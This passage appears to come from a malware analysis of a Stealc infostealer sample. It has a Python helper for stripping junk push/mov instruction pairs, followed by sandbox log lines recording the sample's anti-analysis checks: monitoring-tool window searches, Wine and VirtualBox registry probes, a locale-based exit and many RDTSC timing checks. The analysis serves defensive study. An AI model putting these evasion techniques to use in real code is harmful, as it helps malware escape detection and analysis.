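    ("0_2_00FA58F3", "push edx; mov dword ptr [esp], 77FBDC94h", "0_2_00FA59B3"),
    ("0_2_01030133", "push eax; mov dword ptr [esp], 196E6A2Ch", "0_2_01030143"),
    ("0_2_0101C189", "push eax; mov dword ptr [esp], esp", "0_2_0101C23F"),
]

# push <dead operand> ; mov dword ptr [esp], <live operand>
PAIR = re.compile(
    r"^push\s+(?P<dead>\w+)\s*;\s*mov\s+dword\s+ptr\s+\[esp\]\s*,\s*(?P<live>\w+)$",
    re.IGNORECASE,
)


def simplify_pair(instructions: str) -> str:
    """Rewrite 'push A; mov [esp], B' as 'push B'; return other input unchanged.

    'mov [esp], esp' is left alone: after the push, esp has already been
    decremented by 4, so the stored value is not what 'push esp' would store.
    """
    m = PAIR.match(instructions.strip())
    if not m:
        return instructions
    live = m.group("live")
    if live.lower() == "esp":
        return instructions
    return f"push {live}"


def dead_operand(instructions: str) -> str:
    """Return the operand the pair discards ('' if the line is not such a pair)."""
    m = PAIR.match(instructions.strip())
    return m.group("dead") if m else ""


def simplify_rows(rows: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str, str]]:
    """Annotate each row with its simplified form: (function, original, simplified, address)."""
    return [(fn, ins, simplify_pair(ins), addr) for fn, ins, addr in rows]


if __name__ == "__main__":
    for fn, original, simplified, addr in simplify_rows(SAMPLE_ROWS):
        marker = "" if simplified != original else "  (kept)"
        print(f"{fn} @ {addr}: {original}  ->  {simplified}{marker}")
```

Running the pass over a disassembly listing before diffing functions against a clean Stealc build removes one layer of the immediate-value noise (7B73976Eh, 77FBDC94h, ...) that otherwise defeats byte-pattern matching; the junk immediates are never read, so dropping them changes nothing the program observes.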

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00C69860: GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13564; the sample may exit after checking the system locale)
Source: C:\Users\user\Desktop\file.exe | Registry key opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | Registry key opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103799F, second address 10379A3, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 10379A3, second address 10379AC, instructions: 0x00000000 rdtsc; 0x00000002 push esi; 0x00000003 pop esi; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pushad; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 10379AC, second address 10379B9, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push esi; 0x00000005 pop esi; 0x00000006 push esi; 0x00000007 pop esi; 0x00000008 popad; 0x00000009 push eax; 0x0000000a push edx; 0x0000000b push eax; 0x0000000c pop eax; 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 1036B63, second address 1036B67, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 1036F62, second address 1036F66, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 10370A3, second address 10370B9, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 jmp 00007FB0D4776372h; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 10370B9, second address 10370C9, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 push eax; 0x00000007 push edx; 0x00000008 je 00007FB0D54BC066h; 0x0000000e push eax; 0x0000000f pop eax; 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103721C, second address 1037234, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007FB0D4776374h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 1037234, second address 103724F, instructions: 0x00000000 rdtsc; 0x00000002 jnp 00007FB0D54BC07Dh; 0x00000008 jmp 00007FB0D54BC071h; 0x0000000d push eax; 0x0000000e push edx; 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A269, second address 103A28E, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007FB0D477636Eh; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 push eax; 0x0000000a push edx; 0x0000000b jmp 00007FB0D4776371h; 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A375, second address 103A37B, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 popad; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A37B, second address 103A385, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 jg 00007FB0D4776366h; 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A385, second address 103A3A1, instructions: 0x00000000 rdtsc; 0x00000002 jnc 00007FB0D54BC066h; 0x00000008 pop edx; 0x00000009 pop eax; 0x0000000a pop edx; 0x0000000b pop eax; 0x0000000c mov eax, dword ptr [esp+04h]; 0x00000010 push eax; 0x00000011 push edx; 0x00000012 jmp 00007FB0D54BC06Ah; 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A3A1, second address 103A3C3, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 jmp 00007FB0D4776373h; 0x00000008 push eax; 0x00000009 pop eax; 0x0000000a popad; 0x0000000b pop edx; 0x0000000c pop eax; 0x0000000d mov eax, dword ptr [eax]; 0x0000000f push ecx; 0x00000010 push eax; 0x00000011 push edx; 0x00000012 push edi; 0x00000013 pop edi; 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A3C3, second address 103A3EE, instructions: 0x00000000 rdtsc; 0x00000002 jg 00007FB0D54BC066h; 0x00000008 pop edx; 0x00000009 pop eax; 0x0000000a pop ecx; 0x0000000b mov dword ptr [esp+04h], eax; 0x0000000f jmp 00007FB0D54BC06Ah; 0x00000014 pop eax; 0x00000015 adc edi, 0BAB9718h; 0x0000001b lea ebx, dword ptr [ebp+1245C164h]; 0x00000021 push eax; 0x00000022 push ecx; 0x00000023 push eax; 0x00000024 push eax; 0x00000025 push edx; 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A4DA, second address 103A53F, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007FB0D4776373h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 push eax; 0x0000000a jmp 00007FB0D4776373h; 0x0000000f mov eax, dword ptr [esp+04h]; 0x00000013 pushad; 0x00000014 jo 00007FB0D477636Ch; 0x0000001a jng 00007FB0D4776366h; 0x00000020 jmp 00007FB0D4776373h; 0x00000025 popad; 0x00000026 mov eax, dword ptr [eax]; 0x00000028 pushad; 0x00000029 jmp 00007FB0D477636Eh; 0x0000002e push eax; 0x0000002f push edx; 0x00000030 push edi; 0x00000031 pop edi; 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address 103A53F, second address 103A59D, instructions: 0x00000000 rdtsc; 0x00000002 jo 00007FB0D54BC066h; 0x00000008 pop edx; 0x00000009 pop eax; 0x0000000a popad; 0x0000000b mov dword ptr [esp+04h], eax; 0x0000000f jmp 00007FB0D54BC074h; 0x00000014 pop eax; 0x00000015 mov cx, di; 0x00000018 mov esi, dword ptr [ebp+122D2A9Ah]; 0x0000001e lea ebx, dword ptr [ebp+1245C16Dh]; 0x00000024 call 00007FB0D54BC079h; 0x00000029 jmp 00007FB0D54BC06Bh; 0x0000002e pop ecx; 0x0000002f push eax; 0x00000030 pushad; 0x00000031 push eax; 0x00000032 push edx; 0x00000033 push eax; 0x00000034 pop eax; 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A59D second address: 103A5A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBF5 second address: 105CBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBFB second address: 105CBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CBFF second address: 105CC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC03 second address: 105CC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FB0D4776366h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC15 second address: 105CC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105CC35 second address: 105CC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB45 second address: 105AB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB49 second address: 105AB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB4F second address: 105AB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB0D54BC072h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AB5D second address: 105AB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BB3F second address: 105BB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BC8F second address: 105BCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB0D477636Ch 0x0000000c jnc 00007FB0D4776366h 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCA9 second address: 105BCC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0D54BC072h 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FB0D54BC066h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCC7 second address: 105BCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105BCCB second address: 105BCCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C0C second address: 1052C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C14 second address: 1052C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052C19 second address: 1052C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB0D4776379h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C38B second address: 105C3A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FB0D54BC066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FB0D54BC06Ch 0x00000012 jng 00007FB0D54BC066h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C3A3 second address: 105C3A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FB0B second address: 105FB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063411 second address: 1063417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063417 second address: 1063434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC079h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063434 second address: 1063440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1063440 second address: 1063444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1066C6C second address: 1066C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B038 second address: 106B041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B041 second address: 106B04C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007FB0D4776366h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B04C second address: 106B059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB0D54BC066h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A763 second address: 106A774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D477636Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A774 second address: 106A78C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0D54BC06Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FB0D54BC066h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FB0D54BC066h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AB9B second address: 106ABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D477636Fh 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jnp 00007FB0D4776366h 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ABB9 second address: 106ABCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0D54BC066h 0x0000000a jmp 00007FB0D54BC06Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD77 second address: 106AD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD7B second address: 106AD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106AD81 second address: 106AD9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776371h 0x00000007 je 00007FB0D477636Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B705 second address: 106B70C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9D2 second address: 106B9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9D6 second address: 106B9E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9E0 second address: 106B9E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C250 second address: 106C27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 jg 00007FB0D54BC06Ch 0x0000000f sub dword ptr [ebp+122D1B75h], edx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB0D54BC072h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C798 second address: 106C7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4776372h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D69C second address: 106D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D54BC073h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB0D54BC06Bh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB0D54BC068h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov dword ptr [ebp+124862F3h], ecx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007FB0D54BC068h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov edi, 7BBD31E4h 0x00000051 sub dword ptr [ebp+122D1B1Fh], esi 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e ja 00007FB0D54BC066h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106D726 second address: 106D730 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8B5 second address: 106E8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8BA second address: 106E8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB0D4776366h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106DFA8 second address: 106DFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8C4 second address: 106E8EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0D4776366h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB0D4776377h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E8EA second address: 106E902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D54BC074h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F2D2 second address: 106F322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 jnp 00007FB0D4776366h 0x0000000f push 00000000h 0x00000011 jg 00007FB0D4776384h 0x00000017 jng 00007FB0D4776369h 0x0000001d mov di, bx 0x00000020 push 00000000h 0x00000022 sbb si, 8604h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c je 00007FB0D4776366h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F322 second address: 106F326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F326 second address: 106F32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FCB3 second address: 106FCEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0D54BC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f mov ebx, dword ptr [ebp+122D2C4Ah] 0x00000015 sub dword ptr [ebp+122D1B1Fh], edi 0x0000001b popad 0x0000001c push 00000000h 0x0000001e cmc 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D2E30h], edi 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB0D54BC071h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FCEE second address: 106FCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710CB second address: 10710D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10710D0 second address: 1071131 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0D477637Fh 0x00000008 jmp 00007FB0D4776379h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push esi 0x00000011 sub esi, 3B28250Dh 0x00000017 pop esi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FB0D4776368h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D276Ch] 0x0000003a push 00000000h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007FB0D477636Ch 0x00000045 jns 00007FB0D4776366h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071B96 second address: 1071C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+12488BDDh], esi 0x0000000d push 00000000h 0x0000000f or esi, dword ptr [ebp+1245D4F5h] 0x00000015 sub dword ptr [ebp+122D1816h], eax 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007FB0D54BC068h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 mov di, bx 0x0000003a jmp 00007FB0D54BC071h 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FB0D54BC079h 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C01 second address: 1071C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C07 second address: 1071C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C0C second address: 1071C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB0D4776378h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071C32 second address: 1071C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075DA0 second address: 1075DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
